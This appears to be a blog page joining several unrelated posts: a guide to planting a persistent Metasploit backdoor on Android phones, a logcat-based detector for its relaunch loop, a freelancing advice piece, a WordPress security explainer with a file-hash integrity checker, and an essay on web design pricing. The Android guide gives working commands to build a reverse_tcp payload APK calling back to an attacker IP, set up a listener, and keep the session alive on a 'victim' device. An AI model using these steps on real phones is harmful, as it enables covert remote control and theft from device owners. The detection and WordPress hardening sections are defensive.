Sunday, 4 June 2017

Create a Persistent Back Door in Android Using Kali Linux:


Fire Up Kali and Hack an Android System:

Use this guide to hack an Android system on LAN.
I'll be hacking on WAN, using VMware.

After installing Kali on VMware:

Let's create a backdoor by typing:
  • msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
Now, let's set up a listener:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit
After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)
Move/Copy this to the Home/Root folder of KALI.
--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
To do this, navigate to the directory using the following commands:
  • cd /
Now you should be in the ROOT directory, you can check by typing:
  • ls
Now type:
  • cd etc
Check again by typing:
  • ls
Again change directory:
  • cd init.d
  • ls
Here we are...

Time to Upload the Shell Script:

Do this by typing:
  • upload anything.sh
What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Let's just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:
  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh
Done! Uploaded!

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:
  • shell
Now, navigate to the location of the script:
  • cd /
  • cd /sdcard/Download
  • ls
Now it's time for EXECUTION. Type:
  • sh anything.sh
The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)
Reboot to eliminate the script or use Task Killer

Step 5: Testing...

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:
Wow! It happened so Fast that 3 sessions got opened one after another.
(Tested it on WAN, it works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

  • The persistence of the backdoor will only remain until a reboot of the android system.
  • If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
  • Remember to reboot the Android device to eliminate the running script, if you are testing on your own Android system.
  • If the Victim's Android system is Rooted and your Public IP is Static, then:
1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously
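
Seen from the device owner's or an analyst's side, the loop from Step 2 relaunches the same activity every 20 seconds, which appears in the system log as evenly spaced START entries for one component. The following is an added example, not part of the original post: it flags components relaunched at a near-constant interval. The log lines are constructed, and the `logcat -v threadtime` layout and the threshold values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample in `logcat -v threadtime` layout; real lines vary by Android version.
SAMPLE_LOG = """\
06-04 10:00:01.100   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10021
06-04 10:00:05.200   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
06-04 10:00:25.400   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
06-04 10:00:45.600   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
06-04 10:00:50.300   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10021
06-04 10:01:05.800   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
06-04 10:01:26.000   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN flg=0x10000000 cmp=com.metasploit.stage/.MainActivity} from uid 10123
06-04 10:03:10.000   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10021
06-04 10:03:12.500   900   915 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10021
"""

START_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s+\d+\s+\d+\s+\w\s+"
    r"Activity(?:Task)?Manager: START u\d+ \{.*?cmp=(?P<cmp>[^\s}]+)"
)

def parse_starts(log_text):
    """Return {component: [timestamps]} for every activity START line."""
    starts = defaultdict(list)
    for line in log_text.splitlines():
        m = START_RE.match(line)
        if m:
            # logcat omits the year; a fixed one is enough to compute intervals
            ts = datetime.strptime("2000-" + m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            starts[m["cmp"]].append(ts)
    return starts

def periodic_relaunches(log_text, min_starts=4, max_jitter=2.0):
    """Return {component: mean interval in seconds} for scripted-looking relaunches.

    A loop of `am start` plus a fixed `sleep` gives almost equal gaps between
    launches; a person opening an app does not. Thresholds are assumptions.
    """
    findings = {}
    for component, stamps in parse_starts(log_text).items():
        if len(stamps) < min_starts:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter:
            findings[component] = round(mean(gaps), 1)
    return findings
```

The mail app in the sample is started just as often but at irregular gaps, so only the component relaunched on a timer is reported.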

Monday, 28 April 2014

How to Start Freelancing with No Experience ?


In 2011, the Financial Times (UK) reported a 12% growth in the number of freelancers from 2008. Popular freelance broker site Elance enjoyed consistent growth in past years, with the number of jobs posted rising from around 200,000 in the first quarter of 2012 to 300,000 in the same period in 2013.

In addition to a more flexible work schedule, freelancers tend to be happy. According to the 2012 Freelance Industry Report, 90% of freelancers are happier now than they were before going solo, and nearly half felt no impact from the economic downturn. Perhaps most tellingly, 77% of freelancers were optimistic about their business prospects over the following 12 months.

With freelance work being such an enticing prospect, no one would blame you for giving it some serious thought. However, a common issue is simply not knowing how to start. Fortunately, building a successful freelancing career is easier than it seems — just follow the steps below.

1. Choose Your Craft

Just about everything can be outsourced these days. That's why there's a strong likelihood that the skills on your résumé contain one or more freelancing opportunities.

You may be required to think outside of the box — we're not all graphic designers or programmers. However, you may find that your "secondary" skills can offer up freelancing opportunities. For instance, if you are a strong writer, then you have the potential to develop a freelance writing business.

Don't be paralyzed by a preconception that you do not have the necessary skills or experience — you would be surprised how little experience you need in order to get started. A little faith in your abilities will take you a long way.

2. Create a Brand

If you plan to succeed in the world of freelancing, you will need to create a strong brand that sets you apart from the competition. Your brand is your identity (i.e. your website, blog and social media accounts) and it should clearly communicate your unique selling proposition — what you do that makes you special.

With that in mind, you should narrow down your focus to a specific industry. For instance, as a graphic designer you might choose to do branding work for digital startup businesses only. This form of specialization will make you far more attractive to a specific set of prospective clients and give you a greater chance of success. You can try to cater to all and sundry, but you will probably only provoke indifference.

3. Build a Portfolio and Source Testimonials


The world of freelancing lacks the red tape of the corporate world. Many prospective clients are not concerned with qualifications; they simply want to see what you have done in the past and judge whether it is the right fit for them.

Therefore, if you are good at what you do and can demonstrate your skill through a quality portfolio and positive client testimonials, you have every chance of success. The conundrum, however, is in building a portfolio without experience.

Many freelancers will react to this by picking up the smallest and least lucrative jobs around, but that puts them into a vicious cycle of bargain-basement work. To work for high-paying clients, you need to demonstrate that you are worth big money by doing good work.

So don't be afraid to do pro bono work for the right clients when you are first starting out. The free work you do at this stage can ultimately be priceless when it clearly communicates your worth to future potential clients via an extensive portfolio and glowing testimonials. Also, offering your services at no cost is a gentle introduction into the world of freelancing where you do not feel the pressure of having to deliver a service of requisite value.

4. Start Pitching

You should only seek paying clients when you are able to demonstrate your abilities (and your reputation) with a quality portfolio and testimonials. Once you have done so by working on pro bono jobs, it's time to start pitching.

But whom should you pitch? Well, if you branded yourself correctly then you should know exactly whom to pitch. By having such a narrow focus, potential clients are far more likely to take you seriously than if you offered a generic service. Businesses want to work with freelancers who seemingly came into existence to serve them specifically — you can create this illusion through specialization.

Potential clients can be found everywhere: from Google to social media to your doorstep. The possibilities are endless.

The two keys to successful pitching are relevance and volume. Only pitch those clients who fit the mold of your brand and pitch a lot of them. Ruth Zive of Marketing Wise, a content marketing firm based in Canada, had a "ten before ten" rule when she first started out as a freelance writer — she would make sure to pitch ten prospective clients before 10 a.m. every working day. Those numbers add up quickly.

5. Play the Odds

Ultimately, securing freelance work is a numbers game — the more prospective clients you contact, the more likely you are to find work. That is the equation you should keep in mind. If you have a reasonable skill set and create a quality brand, there is no reason why you cannot succeed in the world of freelancing like so many others have before you.

How do Hackers get in ?

People that don’t want to worry about the technical side of running a blog must feel helpless when it comes to preventing hackers from entering their website. There’s lots of conflicting and unhelpful advice and what is out there is often technical. This post will try and demystify some of the reasons that hackers get into a site which should help in understanding other sources.
When someone views your blog in their web browser, the following things happen:
  1. The browser asks your host for a file, such as MyPost.html
  2. If the file exists the host sends it. Otherwise it passes the request to your blog software, such as WordPress
  3. WordPress figures out that it’s supposed to show a post called MyPost and loads the content of the post and the comments from the database
  4. WordPress loads the theme for your website and starts executing it in order to generate the HTML page that will be sent to the browser.
  5. As it’s going through the theme it’s also executing plugins and core functions that have hooked into the theme. For example, a plugin might add a link to Twitter after the post. The core of WordPress also adds the sidebars, menu, and the contents of the post itself.
  6. Upon receiving the entire page, the browser starts asking for some of the files referenced in the page such as images, stylesheets, and scripts.

What do hackers change?

Hackers work their evil by adding something else into the page or replacing it entirely. They may add extra links, replace your site with a message, or inject malicious code that is served to the web browser.
It’s helpful to think of a blog engine as having the following components:
web server
+- blog core
|    + Code
|    + Static files
|    +- theme
|       + Code
|       + Static files
|    +- plugins
|       + Code
|       + Static files
|    +- database content
+- other files such as media
A hacker must compromise one or more of the above in order to change your site.
  • They can overwrite code files in the core, theme, or plugin to add links, change the content, or run their code on your server
  • They can change the data in the database so that your blog software silently sends whatever they want to the browser
  • They can change media files or static files such as JavaScript to add their own code. For example, they could inject ads or malware into your web page by changing the JavaScript.

How do they change my site?

There are a few ways hackers get in.
  • Guessing passwords - if hackers can guess your FTP or admin passwords then they can change or add posts, or change theme, core, and plugin files.
  • Trojan horse - the malicious software can be bundled with a theme or a plugin. It could be as simple as the plugin adding a spam link to your site, or it could be more complicated, like a back door.
  • Exploiting a vulnerability - Software is written by humans and subject to mistakes. If the hacker can give the script input it didn’t expect, the results might allow the hacker to change files or the database.

How do you protect yourself?

Once you know how hackers do what they do, the solutions become apparent:
  • Get your themes from reputable sources, such as your CMS's official site or well-known commercial sites
  • Limit the plugins you run, and stick to popular ones. This will limit the ways an attacker can get in, and also make sure your site is faster
  • Check for updates frequently and make sure you update when they become available
  • Choose a strong password for your administration and FTP accounts
  • Scan your site for vulnerabilities, including signing up for Google Webmaster Tools
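
One way to notice the file changes described earlier (overwritten core, theme or plugin code, or altered media and static files) is to keep a hash baseline of the site and compare against it. The following is an added example, not code from the original post: it assumes the standard WordPress directory layout, uses constructed file contents, and covers files only, not database content.

```python
import hashlib
import os
import tempfile

# Standard WordPress layout mapped to the components in the tree above.
COMPONENTS = [("wp-content/themes/", "theme"), ("wp-content/plugins/", "plugin"),
              ("wp-content/uploads/", "media")]

def component_of(rel_path):
    return next((name for prefix, name in COMPONENTS if rel_path.startswith(prefix)), "core")

def snapshot(root):
    """Map each file under root (relative path, '/' separators) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return manifest

def diff(baseline, current):
    """Return (component, change, path) tuples, sorted by path."""
    report = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            change = "added"
        elif path not in current:
            change = "removed"
        elif baseline[path] != current[path]:
            change = "modified"
        else:
            continue
        report.append((component_of(path), change, path))
    return report

def needs_review(report):
    """New or changed code files; each should match an update you installed."""
    return [r for r in report if r[1] != "removed" and r[2].endswith((".php", ".js"))]

def demo():
    """Constructed site tree: take a baseline, change three files, diff."""
    def write(root, rel, text):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
    with tempfile.TemporaryDirectory() as root:
        write(root, "wp-includes/version.php", "<?php // core file")
        write(root, "wp-content/themes/mytheme/footer.php", "<?php // theme footer")
        write(root, "wp-content/plugins/share/share.js", "// plugin script")
        baseline = snapshot(root)
        write(root, "wp-content/themes/mytheme/footer.php", "<?php // edited footer")
        write(root, "wp-content/uploads/2017/photo.jpg", "image data")
        write(root, "wp-content/uploads/2017/cache.php", "<?php // unexpected script")
        return diff(baseline, snapshot(root))
```

Take the baseline right after a clean install or update and store it off the server, so that someone who can change the site's files cannot also change the manifest.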

How Much You Should Pay for a Website Design ?


How Much Should You Pay for Website Design?

How much is this going to cost?

It’s a logical thing to ask, really. Those of us who aren’t rich or famous have a finite amount of money, and we always want to feel like that money is being used in the smartest way possible. We are especially cautious when it comes to paying for something intangible like a website – you can’t hold it in your hand, so how much can it really be worth?
The cost of web design work varies wildly. You could ask for quotes from 10 different designers and receive 10 completely different dollar amounts, ranging from a few hundred dollars to several thousand. How do you decide what amount you’re willing to pay?

Factors That Affect the Price of Website Design

1. The components and features you need.
Never assume that your needs are “simple” or should be cheaper than a designer’s standard rate. Some things look easy but are very complicated, while others seem like a big deal but are very easy to implement. Your site may only consist of a single page, yet that doesn’t mean it’s automatically cheaper than one with 5 or even 100 pages.
The thing is, designers don’t always price by the amount of time something takes. Your doctor can stitch a cut in 10 minutes, but that doesn’t mean it doesn’t require knowledge, skill, and precision. Likewise, we have spent considerable time learning to do what we do. If anyone could do it, we wouldn’t have jobs. Adding things like forums, ecommerce, opt-ins, memberships, and other custom functionality is simply going to cost more money.
2. Your designer’s skill level.
Yes, you can get a website for $150. No, it won’t be the same quality as a website that costs $1500. It’s like the difference between a bicycle and a Lexus. Both will get you where you need to go, but one is decidedly better than the other. Designers who charge more are providing you with expertise you won’t find at a bargain rate – and in most cases, the benefits will definitely outweigh the added costs. If you automatically choose the cheapest option, you risk hiring a designer who sucks. Don’t say I didn’t warn you!
3. How demanding you are as a client.
Oops, I mentioned one of those things no one is supposed to talk about! But in the interest of being honest, I’ll just tell you: If you email or call me 50 times a day, expect a billion tiny revisions, cut into my time with my family, and/or request things outside the scope of our working relationship, it’s going to cost you. Over time, designers learn how to sniff out “difficult” clients pretty easily, but if one sneaks through the gates, we are going to make absolutely sure we are compensated for the extra work. Please remember that designers are people and we (sometimes) have lives away from our computers.

So How Much Should I Pay?

Here are a few questions to ask yourself before deciding on a budget for website design.

For Blogs:

What is the point of my blog? If you blog to share photos and memories with your family and don’t make any money from it, I wouldn’t spend more than a few hundred dollars for a design at the most. Actually I’d probably just grab a free theme and leave it at that. If, however, you make thousands of dollars a year from your blog and need it to do specific things for your visitors, it’s time to increase the budget.
What will I gain from a professional design? Whether you want to attract better advertisers or get featured on big name websites, a professionally designed blog will always outperform a generic one. If you knew that spending $2000 now would earn you 5-6 times that in the next year alone, wouldn’t it make sense to spend the money?
Should I outsource this? Many, many bloggers ask me for a quote, then tell me they’re going to design their own sites to save money. When that happens I usually see one of four results:
  • They waste hours and hours trying to figure out what to do, then the end result still looks awful.
  • They waste hours and hours trying to figure out what to do, then get frustrated and hire someone anyway.
  • They immediately go hire a cheaper designer, then end up hiring me to fix what the designer broke.
  • They pay for another design within a year of the DIY job because it wasn’t what they wanted.
In those situations, all I see is wasted time, money, and/or effort. If you’re a blogger, focus on blogging, especially if that’s how you earn your living. There’s no shame in outsourcing the things that aren’t a good use of your time.
WHAT YOU SHOULD SPEND: Anywhere from a few hundred to a few thousand dollars, depending on the value you would get from a better design. In general, I wouldn’t spend more than $5000 on a blog design unless you have a huge audience and very specialized needs.

For Business Websites:

How important is it to have a website for my business?
 It’s the 21st century, and over 60% of internet users research products and services online before they make a purchase. If your company doesn’t have a website, regardless of what you do or how many employees you have, you are totally missing out. That said, having an ugly, outdated website isn’t going to help you much in the reputation department. It’s easy to tell yourself that any web presence is better than none, but you can certainly lose potential clients or customers if they perceive your brand as “cheap” or out of touch.
What does my website actually do for my business?
 Do people use your website to learn about what you offer? Make appointments? Purchase products? Find your phone number? Two important points about this: (1) If your website doesn’t lead to more business, that’s a problem. And it’s not because the web doesn’t work – it’s because your site doesn’t. (2) If your website does lead to more business, it’s time to ask yourself what could help improve conversion rates or make things easier for clients and customers.
What does my business really need?
 I’ve talked to business owners who are obsessed with things that simply don’t matter. They absolutely must have a menu that pops out a certain way, or they want to push content lower on the page just to make the logo bigger. And while they’re worrying about all those nitpicky details, they’re missing the fact that half their visitors never click beyond the homepage. If you aren’t sure what your business site needs, it’s time to consult with someone who does. Immediately.
WHAT YOU SHOULD SPEND:
 Website designs for businesses are more difficult to price because there are so many factors involved. I would say you should always expect at least several thousand dollars, if not much more than that. Don’t like that answer? Try thinking of your website as an employee (click that link – it’s worth it) and I think you’ll see why you’re getting a bargain no matter what you spend.